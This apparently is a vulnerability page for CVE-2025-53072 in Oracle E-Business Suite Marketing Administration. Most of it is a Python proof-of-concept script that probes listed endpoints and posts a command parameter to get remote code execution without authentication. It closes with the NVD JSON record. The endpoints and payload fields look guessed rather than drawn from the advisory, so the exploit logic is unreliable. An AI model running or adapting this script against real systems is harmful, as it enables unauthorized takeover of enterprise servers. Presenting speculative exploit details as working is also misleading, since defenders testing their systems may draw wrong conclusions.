CVE-2025-53072

# CVE-2025-53072 PoC - Oracle E-Business Suite Marketing Administration RCE # WARNING: For authorized security testing and educational purposes only. # This PoC demonstrates the exploitation pattern for CVE-2025-53072 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-ebs.example.com" # Oracle EBS Marketing Administration typical endpoint paths MARKETING_ENDPOINTS = [ "/OA_HTML/OA.jsp", "/OA_HTML/jsp/fnd/FndAttachment.jsp", "/marketing/admin/AdminServlet", "/OA_HTML/RF.jsp", ] def exploit_cve_2025_53072(target_url): """ Exploit CVE-2025-53072: Unauthenticated RCE via Oracle Marketing Administration The vulnerability exists in the Marketing Administration component that fails to properly validate authentication on certain administrative endpoints. """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", } for endpoint in MARKETING_ENDPOINTS: url = f"{target_url}{endpoint}" try: # Step 1: Probe the vulnerable endpoint resp = requests.get(url, headers=headers, timeout=10, verify=False) if resp.status_code == 200: print(f"[+] Endpoint reachable: {url}") # Step 2: Send crafted payload exploiting the unauthenticated admin function # The vulnerability allows unauthenticated access to admin operations # that can be leveraged for command execution payload = { "function_id": "MARKETING_ADMIN", "operation": "EXECUTE", "cmd": "id", # Replace with actual payload for code execution } resp = requests.post(url, data=payload, headers=headers, timeout=10, verify=False) if resp.status_code == 200 and "uid=" in resp.text: print(f"[+] Exploitation successful via {endpoint}") print(f"[+] Output: {resp.text[:500]}") return True except Exception as e: print(f"[-] Error probing {endpoint}: {e}") continue return False if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print("[*] CVE-2025-53072 - Oracle EBS Marketing Administration RCE") exploit_cve_2025_53072(TARGET_URL)

{"cve": {"id": "CVE-2025-53072", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:48.600", "lastModified": "2025-10-24T14:36:58.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in takeover of Oracle Marketing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:marketing:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "4EDDFC92-2982-411E-8A5F-AB0BD6E293E1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}